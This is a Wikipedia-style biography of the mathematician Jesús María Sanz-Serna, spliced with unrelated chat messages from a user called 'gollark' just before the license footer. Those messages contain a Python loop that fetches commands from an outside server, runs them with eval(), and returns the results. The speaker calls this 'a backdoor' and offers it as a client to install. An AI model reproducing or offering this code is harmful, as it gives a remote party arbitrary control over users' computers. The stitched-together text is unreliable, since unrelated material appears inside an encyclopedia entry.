Jesús María Sanz-Serna

Jesús María Sanz-Serna (born 12 June 1953 in Valladolid, Spain) is a mathematician who specializes in applied mathematics. Sanz-Serna pioneered the field of geometric integration and wrote the first book on this subject.[1] From 1998 to 2006, he was rector of the University of Valladolid.[2]

He received the inaugural Dahlquist Prize from the Society for Industrial and Applied Mathematics in 1995[3] and became one of the inaugural fellows of the American Mathematical Society in 2012.[4] His 60th birthday was celebrated at the 2013 International Conference on Scientific Computation and Differential Equations (SciCADE) in Valladolid.[5]

Notes

  1. Sanz-Serna, Jesús María; Calvo, Mari-Paz (1994), Numerical Hamiltonian Problems, Chapman & Hall, ISBN 0-412-54290-0
  2. Sanz-Serna's CV
  3. Germund Dahlquist Prize at the SIAM website
  4. List of Fellows of the American Mathematical Society, retrieved 2015-01-18.
  5. Sanz-Serna's birthday
gollark: This may slightly be a backdoor somewhat.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```
gollark: You can install the official SPUDNET-HTTP client on your computers.
gollark: It also actually has working autoreconnect.
gollark: SPUDNET is the Super PotatOS Update/Debug NETwork.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.